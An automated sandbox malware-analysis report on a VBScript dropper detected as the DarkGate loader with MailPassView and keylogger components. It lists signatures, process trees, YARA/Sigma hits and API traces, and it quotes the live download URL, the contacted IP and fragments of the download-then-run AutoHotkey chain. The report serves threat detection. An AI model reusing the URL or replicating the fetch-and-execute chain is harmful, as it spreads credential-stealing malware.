Windows Analysis Report
ndvdikok.vbs

Overview

General Information

Sample name:ndvdikok.vbs
Analysis ID:1427163
MD5:32f61baa669991fb989439babaf493ff
SHA1:4242d545077e3e643854e3148e00c8283533b9ab
SHA256:75db6f949461cb03a155dd26c781a3c9e00edb917275f3b4d306b7094ed06a14
Tags:DarkGate, vbs
Infos:

Detection

DarkGate, MailPassView
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Benign windows process drops PE files
Multi AV Scanner detection for submitted file
System process connects to network (likely due to code injection or exploit)
VBScript performs obfuscated calls to suspicious functions
Yara detected DarkGate
Yara detected MailPassView
Contains functionality to inject code into remote processes
Contains functionality to inject threads in other processes
Contains functionality to register a low level keyboard hook
Potential malicious VBS script found (has network functionality)
Sample or dropped binary is a compiled AutoHotkey binary
Sigma detected: Script Initiated Connection to Non-Local Network
Sigma detected: WScript or CScript Dropper
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
AV process strings found (often used to terminate AV products)
Contains functionality for read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found evaded block containing many API calls
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Queries information about the installed CPU (vendor, model number etc)
Queries the product ID of Windows
Queries the volume information (name, serial number etc) of a device
Sigma detected: Script Initiated Connection
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses the keyboard layout for branch decision (may execute only for specific keyboard layouts)
Yara detected Keylogger Generic

Classification

  • System is w10x64
  • wscript.exe (PID: 6640 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\ndvdikok.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • AutoHotkey.exe (PID: 6544 cmdline: "C:\NwiQ\Autohotkey.exe" "c:\NwiQ\script.ahk" MD5: A59A2D3E5DDA7ACA6EC879263AA42FD3)
  • cleanup
Name: DarkGate
Description: First documented in 2018, DarkGate is a commodity loader with features that include the ability to download and execute files to memory, a Hidden Virtual Network Computing (HVNC) module, keylogging, information-stealing capabilities, and privilege escalation. DarkGate makes use of legitimate AutoIt files and typically runs multiple AutoIt scripts. New versions of DarkGate have been advertised on a Russian language eCrime forum since May 2023.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.darkgate
No configs have been found
Source | Rule | Description | Author | Strings
00000001.00000002.1665821526.00000000048AA000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_DarkGate | Yara detected DarkGate | Joe Security |
00000001.00000002.1665821526.0000000004840000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_MailPassView | Yara detected MailPassView | Joe Security |
Process Memory Space: AutoHotkey.exe PID: 6544 | JoeSecurity_MailPassView | Yara detected MailPassView | Joe Security |
Process Memory Space: AutoHotkey.exe PID: 6544 | JoeSecurity_DarkGate | Yara detected DarkGate | Joe Security |
Process Memory Space: AutoHotkey.exe PID: 6544 | JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security |

            System Summary

            Source: Network ConnectionAuthor: frack113, Florian Roth: Data: DestinationIp: 205.234.201.153, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Windows\System32\wscript.exe, Initiated: true, ProcessId: 6640, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49730
            Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\ndvdikok.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\ndvdikok.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\ndvdikok.vbs", ProcessId: 6640, ProcessName: wscript.exe
            Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 205.234.201.153, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Windows\System32\wscript.exe, Initiated: true, ProcessId: 6640, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49730
            Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\ndvdikok.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\ndvdikok.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\ndvdikok.vbs", ProcessId: 6640, ProcessName: wscript.exe
            No Snort rule has matched

            AV Detection

            Source: ndvdikok.vbs Virustotal: Detection: 15%
            Source: C:\NwiQ\AutoHotkey.exeCode function: 1_2_00480DC0 _wcschr,_wcschr,_wcschr,FindFirstFileW,FindClose,_wcschr,FindFirstFileW,FindClose,1_2_00480DC0
            Source: C:\NwiQ\AutoHotkey.exeCode function: 1_2_0045E220 _wcschr,_wcschr,GetFileAttributesW,FindFirstFileW,FindClose,CoInitialize,CoCreateInstance,CoUninitialize,1_2_0045E220
            Source: C:\NwiQ\AutoHotkey.exeCode function: 1_2_0047C320 FindFirstFileW,FindClose,GetFileAttributesW,CreateFileW,WriteFile,WriteFile,WriteFile,CloseHandle,1_2_0047C320
            Source: C:\NwiQ\AutoHotkey.exeCode function: 1_2_0044D570 FindFirstFileW,GetTickCount,GetTickCount,PeekMessageW,GetTickCount,FindNextFileW,FindClose,GetLastError,FindFirstFileW,GetTickCount,GetTickCount,PeekMessageW,GetTickCount,__swprintf,FindNextFileW,FindClose,1_2_0044D570
            Source: C:\NwiQ\AutoHotkey.exeCode function: 1_2_0044D870 FindFirstFileW,GetLastError,FindClose,FileTimeToLocalFileTime,1_2_0044D870
            Source: C:\NwiQ\AutoHotkey.exeCode function: 1_2_00437B70 FindFirstFileW,FindNextFileW,FindClose,FindNextFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,FindClose,1_2_00437B70
            Source: C:\NwiQ\AutoHotkey.exeCode function: 1_2_0044DBB0 CreateFileW,GetFileSizeEx,CloseHandle,FindFirstFileW,GetLastError,FindClose,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,1_2_0044DBB0
            Source: C:\NwiQ\AutoHotkey.exeCode function: 1_2_00480D30 FindFirstFileW,FindClose,GetFileAttributesW,1_2_00480D30
            Source: C:\NwiQ\AutoHotkey.exeCode function: 1_2_0045EEA0 GetFullPathNameW,GetFullPathNameW,GetFullPathNameW,GetFileAttributesW,GetFileAttributesW,GetFileAttributesW,FindFirstFileW,GetLastError,_wcsrchr,_wcsrchr,_wcsncpy,GetTickCount,PeekMessageW,GetTickCount,MoveFileW,DeleteFileW,MoveFileW,GetLastError,CopyFileW,GetLastError,FindNextFileW,FindClose,1_2_0045EEA0
            Source: C:\NwiQ\AutoHotkey.exeCode function: 1_2_048495A1 FindFirstFileA,GetLastError,1_2_048495A1
            Source: C:\NwiQ\AutoHotkey.exeCode function: 1_2_0489C541 FindFirstFileW,FindNextFileW,FindClose,1_2_0489C541
            Source: C:\NwiQ\AutoHotkey.exeCode function: 1_2_0484655D GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,1_2_0484655D
            Source: C:\NwiQ\AutoHotkey.exeCode function: 1_2_0489B145 FindFirstFileW,lstrcmpW,lstrcmpW,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FindNextFileW,FindClose,1_2_0489B145
            Source: C:\NwiQ\AutoHotkey.exeCode function: 1_2_04876FE5 FindFirstFileW,FindNextFileW,FindClose,1_2_04876FE5
            Source: C:\NwiQ\AutoHotkey.exeCode function: 1_2_04873871 FindFirstFileW,FindNextFileW,FindClose,1_2_04873871

            Networking

            Source: C:\Windows\System32\wscript.exe Network Connect: 205.234.201.153 80
            Source: Initial file: stream.Write xmlhttp.ResponseBody
            Source: Initial file: stream.SaveToFile zipFile, 2
            Source: Joe Sandbox ViewASN Name: SERVERCENTRALUS SERVERCENTRALUS
            Source: global trafficHTTP traffic detected: GET /fykbmgsz HTTP/1.1Accept: */*Accept-Language: en-chUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: backupssupport.comConnection: Keep-Alive
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: C:\NwiQ\AutoHotkey.exeCode function: 1_2_0045DB90 __wcstoi64,InternetOpenW,InternetOpenUrlW,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,InternetReadFile,InternetReadFile,GetTickCount,GetTickCount,PeekMessageW,GetTickCount,InternetReadFile,InternetReadFileExA,InternetReadFileExA,GetTickCount,GetTickCount,PeekMessageW,GetTickCount,InternetReadFileExA,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,DeleteFileW,1_2_0045DB90
            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKConnection: closeContent-Disposition: attachment; filename="fykbmgsz"Content-Type: application/octet-streamContent-Length: 795674Date: Wed, 17 Apr 2024 04:39:55 GMT
            Source: unknownDNS traffic detected: queries for: backupssupport.com
            Source: wscript.exe, 00000000.00000002.1660300685.000001D5A3ECA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1660138257.000001D5A3D19000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1658115436.000001D5A5B32000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1655827819.000001D5A3D13000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1658042445.000001D5A3C9E000.00000004.00000020.00020000.00000000.sdmp, ndvdikok.vbsString found in binary or memory: http://backupssupport.com/fykbmgsz
            Source: wscript.exe, 00000000.00000003.1655755076.000001D5A3CE7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1660138257.000001D5A3D19000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1655827819.000001D5A3D13000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://backupssupport.com/fykbmgsz6
            Source: wscript.exe, 00000000.00000003.1656750950.000001D5A3C95000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1659182934.000001D5A3C9F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1658042445.000001D5A3C9E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://backupssupport.com/fykbmgszj
            Source: AutoHotkey.exe, AutoHotkey.exe, 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmp, AutoHotkey.exe, 00000001.00000000.1655102872.00000000004AD000.00000002.00000001.01000000.00000008.sdmp, AutoHotkey.exe.0.drString found in binary or memory: https://autohotkey.com
            Source: AutoHotkey.exe, 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmp, AutoHotkey.exe, 00000001.00000000.1655102872.00000000004AD000.00000002.00000001.01000000.00000008.sdmp, AutoHotkey.exe.0.drString found in binary or memory: https://autohotkey.comCould
            Source: wscript.exe, 00000000.00000002.1660535194.000001D5A5EE0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com

            Key, Mouse, Clipboard, Microphone and Screen Capturing

            Source: C:\NwiQ\AutoHotkey.exeCode function: 1_2_0040E820 SetWindowsHookExW 0000000D,Function_00009EA0,00400000,00000000,1_2_0040E820
            Source: C:\NwiQ\AutoHotkey.exeCode function: 1_2_00405430 GetTickCount,IsClipboardFormatAvailable,GetTickCount,OpenClipboard,OpenClipboard,GetTickCount,OpenClipboard,1_2_00405430
            Source: C:\NwiQ\AutoHotkey.exeCode function: 1_2_00405160 EmptyClipboard,GlobalUnlock,CloseClipboard,GlobalUnlock,GlobalUnlock,GlobalFree,GlobalUnlock,CloseClipboard,SetClipboardData,GlobalUnlock,CloseClipboard,1_2_00405160
            Source: C:\NwiQ\AutoHotkey.exeCode function: 1_2_00483160 EmptyClipboard,GlobalUnlock,CloseClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,GlobalUnlock,CloseClipboard,GlobalFree,GlobalUnlock,CloseClipboard,1_2_00483160
            Source: C:\NwiQ\AutoHotkey.exeCode function: 1_2_00405330 GetClipboardFormatNameW,__wcsnicmp,__wcsicoll,__wcsicoll,__wcsicoll,__wcsicoll,__wcsicoll,__wcsicoll,GetClipboardData,1_2_00405330
            Source: C:\NwiQ\AutoHotkey.exeCode function: 1_2_004442E0 GetForegroundWindow,IsIconic,GetWindowRect,ClientToScreen,_wcsrchr,__wcsicoll,__wcsicoll,__wcsicoll,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,__wcsnicmp,__fassign,__wcsnicmp,_wcsncpy,__fassign,__fassign,__fassign,__fassign,GetDC,DestroyIcon,DeleteObject,DeleteObject,GetIconInfo,DeleteObject,DeleteObject,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,ReleaseDC,DeleteObject,SelectObject,DeleteDC,DeleteObject,_free,_free,_free,1_2_004442E0
            Source: C:\NwiQ\AutoHotkey.exeCode function: 1_2_00416010 GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetTickCount,1_2_00416010
            Source: C:\NwiQ\AutoHotkey.exeCode function: 1_2_004014E4 GlobalUnlock,CloseClipboard,SetTimer,GetTickCount,GetTickCount,GetMessageW,GetTickCount,GetFocus,TranslateAcceleratorW,GetKeyState,GetWindowLongW,IsWindowEnabled,GetKeyState,GetKeyState,GetKeyState,GetWindowLongW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,IsDialogMessageW,ShowWindow,GetForegroundWindow,GetWindowThreadProcessId,GetClassNameW,KillTimer,DragQueryFileW,DragFinish,GetTickCount,DragFinish,DragFinish,_wcsncpy,_wcsncpy,GetTickCount,_wcsncpy,GetTickCount,IsDialogMessageW,SetCurrentDirectoryW,TranslateAcceleratorW,TranslateMessage,DispatchMessageW,1_2_004014E4
            Source: C:\NwiQ\AutoHotkey.exeCode function: 1_2_00418140 GetKeyState,GetKeyState,GetKeyState,GetForegroundWindow,GetWindowThreadProcessId,GetKeyState,1_2_00418140
            Source: C:\NwiQ\AutoHotkey.exeCode function: 1_2_00414870 __wcsnicmp,__wcsnicmp,GetWindowThreadProcessId,AttachThreadInput,GetTickCount,GetCurrentThreadId,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetGUIThreadInfo,GetWindowThreadProcessId,GetKeyboardLayout,GetTickCount,BlockInput,GetTickCount,GetTickCount,PeekMessageW,GetTickCount,_wcschr,_wcschr,__wcsnicmp,__wcsnicmp,_wcschr,__wcsnicmp,__wcsnicmp,__wcsnicmp,__wcsnicmp,__wcsnicmp,__wcsicoll,PostMessageW,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetTickCount,GetTickCount,PeekMessageW,GetTickCount,__wcsnicmp,__wcsnicmp,__fassign,PostMessageW,PostMessageW,PostMessageW,__itow,PostMessageW,_free,GetTickCount,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetTickCount,GetKeyState,GetKeyState,GetKeyState,GetForegroundWindow,GetWindowThreadProcessId,AttachThreadInput,BlockInput,GetForegroundWindow,GetWindowThreadProcessId,1_2_00414870
            Source: Yara matchFile source: Process Memory Space: AutoHotkey.exe PID: 6544, type: MEMORYSTR
            Source: C:\NwiQ\AutoHotkey.exeCode function: 1_2_0487357D CreateDesktopA,CreateProcessA,CreateProcessA,CreateProcessA,CreateProcessA,WaitForSingleObject,1_2_0487357D

            System Summary

            Source: C:\NwiQ\AutoHotkey.exe Window found: window name: AutoHotkey
            Source: C:\Windows\System32\wscript.exe COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
            Source: C:\Windows\System32\wscript.exe COM Object queried: Shell Automation Service HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{13709620-C279-11CE-A49E-444553540000}
            Source: C:\Windows\System32\wscript.exe COM Object queried: XML HTTP HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F6D90F16-9C73-11D3-B32E-00C04F990BB4}
            Source: C:\Windows\System32\wscript.exe COM Object queried: ADODB.Stream HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{00000566-0000-0010-8000-00AA006D2EA4}
            Source: C:\NwiQ\AutoHotkey.exeCode function: 1_2_04895009 Sleep,TerminateThread,NtClose,NtClose,1_2_04895009
            Source: C:\NwiQ\AutoHotkey.exeCode function: 1_2_04894C89 NtDuplicateObject,NtClose,1_2_04894C89
            Source: C:\NwiQ\AutoHotkey.exeCode function: 1_2_04894CBD NtQueryObject,NtQueryObject,1_2_04894CBD
            Source: C:\NwiQ\AutoHotkey.exeCode function: 1_2_04894D15 NtOpenProcess,1_2_04894D15
            Source: C:\NwiQ\AutoHotkey.exeCode function: 1_2_04894D65 NtQuerySystemInformation,NtDuplicateObject,NtClose,NtClose,NtClose,NtClose,NtClose,NtClose,NtClose,1_2_04894D65
            Source: C:\NwiQ\AutoHotkey.exeCode function: 1_2_0486A8DD GetCurrentProcessId,OpenProcess,InitializeProcThreadAttributeList,GetProcessHeap,RtlAllocateHeap,InitializeProcThreadAttributeList,UpdateProcThreadAttribute,CreateProcessA,NtQueryInformationProcess,ReadProcessMemory,ReadProcessMemory,WriteProcessMemory,ResumeThread,Sleep,GetTickCount,1_2_0486A8DD
            Source: C:\NwiQ\AutoHotkey.exeCode function: 1_2_0486ABFD GetCurrentProcessId,CreateProcessA,NtQueryInformationProcess,ReadProcessMemory,ReadProcessMemory,WriteProcessMemory,ResumeThread,Sleep,GetTickCount,1_2_0486ABFD
            Source: C:\NwiQ\AutoHotkey.exeCode function: 1_2_00449B70: __swprintf,CreateFileW,DeviceIoControl,CloseHandle,1_2_00449B70
            Source: C:\NwiQ\AutoHotkey.exeCode function: 1_2_0045F410 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,1_2_0045F410
            Source: Joe Sandbox ViewDropped File: C:\NwiQ\AutoHotkey.exe 897B0D0E64CF87AC7086241C86F757F3C94D6826F949A1F0FEC9C40892C0CECB
            Source: C:\NwiQ\AutoHotkey.exeCode function: String function: 04875E39 appears 33 times
            Source: C:\NwiQ\AutoHotkey.exeCode function: String function: 00480050 appears 42 times
            Source: C:\NwiQ\AutoHotkey.exeCode function: String function: 04845251 appears 76 times
            Source: C:\NwiQ\AutoHotkey.exeCode function: String function: 0043A140 appears 78 times
            Source: C:\NwiQ\AutoHotkey.exeCode function: String function: 00409044 appears 36 times
            Source: C:\NwiQ\AutoHotkey.exeCode function: String function: 0047FFB0 appears 67 times
            Source: C:\NwiQ\AutoHotkey.exeCode function: String function: 0049A3AA appears 60 times
            Source: C:\NwiQ\AutoHotkey.exeCode function: String function: 0484520D appears 34 times
            Source: C:\NwiQ\AutoHotkey.exeCode function: String function: 048454ED appears 97 times
            Source: C:\NwiQ\AutoHotkey.exeCode function: String function: 0049A90E appears 35 times
            Source: C:\NwiQ\AutoHotkey.exeCode function: String function: 04844F7D appears 101 times
            Source: C:\NwiQ\AutoHotkey.exeCode function: String function: 0043A420 appears 283 times
            Source: C:\NwiQ\AutoHotkey.exeCode function: String function: 00499C29 appears 342 times
            Source: C:\NwiQ\AutoHotkey.exeCode function: String function: 04847581 appears 77 times
            Source: C:\NwiQ\AutoHotkey.exeCode function: String function: 004A7DD0 appears 51 times
            Source: ndvdikok.vbsInitial sample: Strings found which are bigger than 50
            Source: classification engineClassification label: mal100.troj.spyw.evad.winVBS@3/7@1/1
            Source: C:\NwiQ\AutoHotkey.exeCode function: 1_2_0043B100 GetFileAttributesW,__wcsicoll,__wcsicoll,__wcsicoll,__wcsicoll,__wcsicoll,__wcsicoll,__wcsicoll,__wcsicoll,__wcsicoll,__wcsicoll,__wcsicoll,__wcsicoll,_memset,__swprintf,CreateProcessW,CloseHandle,CloseHandle,GetLastError,_memset,__wcsicoll,_wcschr,SetCurrentDirectoryW,_wcschr,_wcschr,GetFileAttributesW,_wcschr,SetCurrentDirectoryW,ShellExecuteExW,GetModuleHandleW,GetProcAddress,GetLastError,FormatMessageW,1_2_0043B100
            Source: C:\NwiQ\AutoHotkey.exeCode function: 1_2_0045F410 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,1_2_0045F410
            Source: C:\NwiQ\AutoHotkey.exeCode function: 1_2_00449810 _wcsncpy,GetDiskFreeSpaceExW,1_2_00449810
            Source: C:\NwiQ\AutoHotkey.exeCode function: 1_2_0045F620 CreateToolhelp32Snapshot,Process32FirstW,__wcstoi64,Process32NextW,__wsplitpath,__wcsicoll,Process32NextW,CloseHandle,CloseHandle,CloseHandle,1_2_0045F620
            Source: C:\NwiQ\AutoHotkey.exeCode function: 1_2_0045E220 _wcschr,_wcschr,GetFileAttributesW,FindFirstFileW,FindClose,CoInitialize,CoCreateInstance,CoUninitialize,1_2_0045E220
            Source: C:\NwiQ\AutoHotkey.exeCode function: 1_2_00481EC0 LoadLibraryExW,EnumResourceNamesW,FindResourceW,LoadResource,LockResource,GetSystemMetrics,FindResourceW,LoadResource,LockResource,SizeofResource,CreateIconFromResourceEx,FreeLibrary,ExtractIconW,ExtractIconW,1_2_00481EC0
            Source: C:\Windows\System32\wscript.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\fykbmgsz[1]
            Source: C:\NwiQ\AutoHotkey.exe File created: C:\temp\
            Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\ndvdikok.vbs"
            Source: C:\NwiQ\AutoHotkey.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
            Source: C:\Windows\System32\wscript.exe File read: C:\Users\user\Desktop\desktop.ini
            Source: C:\Windows\System32\wscript.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: C:\Windows\System32\wscript.exeProcess created: C:\NwiQ\AutoHotkey.exe "C:\NwiQ\Autohotkey.exe" "c:\NwiQ\script.ahk"
            Source: C:\Windows\System32\wscript.exe Section loaded: version.dll, kernel.appcore.dll, uxtheme.dll, sxs.dll, vbscript.dll, amsi.dll, userenv.dll, profapi.dll, wldp.dll, msasn1.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, msisip.dll, wshext.dll, scrobj.dll, mpr.dll, scrrun.dll, msxml3.dll, msdart.dll, wininet.dll, iertutil.dll, mlang.dll, urlmon.dll, srvcli.dll, netutils.dll, sspicli.dll, windows.storage.dll, ondemandconnroutehelper.dll, winhttp.dll, mswsock.dll, iphlpapi.dll, winnsi.dll, dnsapi.dll, rasadhlp.dll, fwpuclnt.dll, propsys.dll, apphelp.dll, zipfldr.dll, edputil.dll, windows.staterepositoryps.dll, windows.fileexplorer.common.dll, shdocvw.dll, winshfhc.dll, wdscore.dll, gpapi.dll, linkinfo.dll, ntshrui.dll, cscapi.dll, wintypes.dll, appresolver.dll, bcp47langs.dll, slc.dll, sppc.dll, onecorecommonproxystub.dll, onecoreuapcommonproxystub.dll
            Source: C:\NwiQ\AutoHotkey.exe Section loaded: wsock32.dll, winmm.dll, version.dll, wininet.dll, kernel.appcore.dll, uxtheme.dll, textshaping.dll, urlmon.dll, iertutil.dll, srvcli.dll, netutils.dll, sspicli.dll
            Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32

            Data Obfuscation

            Source: C:\Windows\System32\wscript.exe Anti Malware Scan Interface: .Run(""c:\NwiQ\Autohotkey.exe" "c:\NwiQ\script.ahk"", "1", "false");
            Source: C:\NwiQ\AutoHotkey.exeCode function: 1_2_004A5040 LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,1_2_004A5040
            Source: C:\Windows\System32\wscript.exe File created: C:\NwiQ\AutoHotkey.exe
            Source: C:\NwiQ\AutoHotkey.exeCode function: 1_2_00484030 GetForegroundWindow,IsWindowVisible,IsIconic,ShowWindow,1_2_00484030
            Source: C:\NwiQ\AutoHotkey.exeCode function: 1_2_00484160 GetWindowThreadProcessId,GetWindowThreadProcessId,GetForegroundWindow,IsIconic,ShowWindow,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,SetForegroundWindow,SetForegroundWindow,GetForegroundWindow,GetWindow,AttachThreadInput,AttachThreadInput,BringWindowToTop,1_2_00484160
            Source: C:\NwiQ\AutoHotkey.exeCode function: 1_2_004442E0 GetForegroundWindow,IsIconic,GetWindowRect,ClientToScreen,_wcsrchr,__wcsicoll,__wcsicoll,__wcsicoll,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,__wcsnicmp,__fassign,__wcsnicmp,_wcsncpy,__fassign,__fassign,__fassign,__fassign,GetDC,DestroyIcon,DeleteObject,DeleteObject,GetIconInfo,DeleteObject,DeleteObject,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,ReleaseDC,DeleteObject,SelectObject,DeleteDC,DeleteObject,_free,_free,_free,1_2_004442E0
            Source: C:\NwiQ\AutoHotkey.exeCode function: 1_2_0045C3A0 GetForegroundWindow,IsIconic,GetWindowRect,ClientToScreen,CreateDCW,GetDC,GetPixel,DeleteDC,ReleaseDC,__swprintf,1_2_0045C3A0
            Source: C:\NwiQ\AutoHotkey.exeCode function: 1_2_004813B0 GetForegroundWindow,IsIconic,GetWindowRect,ClientToScreen,1_2_004813B0
            Source: C:\NwiQ\AutoHotkey.exeCode function: 1_2_00481410 GetForegroundWindow,IsIconic,GetWindowRect,ClientToScreen,1_2_00481410
            Source: C:\NwiQ\AutoHotkey.exeCode function: 1_2_004427E0 GetForegroundWindow,IsWindowVisible,GetWindowThreadProcessId,IsZoomed,IsIconic,GetWindowLongW,__swprintf,GetModuleHandleW,GetProcAddress,__swprintf,1_2_004427E0
            Source: C:\NwiQ\AutoHotkey.exeCode function: 1_2_0046C900 GetWindowLongW,GetWindowLongW,GetWindowLongW,__wcsnicmp,__wcsnicmp,__wcsicoll,SetWindowPos,__wcsicoll,__wcsicoll,__wcsnicmp,__wcsicoll,__wcsicoll,__wcsicoll,EnableWindow,__wcsnicmp,__wcsnicmp,__wcsicoll,__wcsicoll,__wcsicoll,__wcsnicmp,MulDiv,MulDiv,__wcsnicmp,MulDiv,MulDiv,__wcsicoll,__wcsicoll,__wcsicoll,__wcsicoll,__wcsicoll,__wcsicoll,__wcstoi64,IsWindow,SetParent,SetWindowLongW,SetParent,IsWindowVisible,IsIconic,SetWindowLongW,SetWindowLongW,SetWindowPos,InvalidateRect,1_2_0046C900
            Source: C:\NwiQ\AutoHotkey.exeCode function: 1_2_00443AD0 GetForegroundWindow,IsIconic,GetWindowRect,ClientToScreen,GetDC,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,__swprintf,ReleaseDC,SelectObject,DeleteDC,DeleteObject,_free,GetPixel,ReleaseDC,1_2_00443AD0
            Source: C:\NwiQ\AutoHotkey.exeCode function: 1_2_00446BC0 GetCursorPos,GetForegroundWindow,IsIconic,GetWindowRect,ClientToScreen,WindowFromPoint,EnumChildWindows,_memset,EnumChildWindows,GetClassNameW,EnumChildWindows,1_2_00446BC0
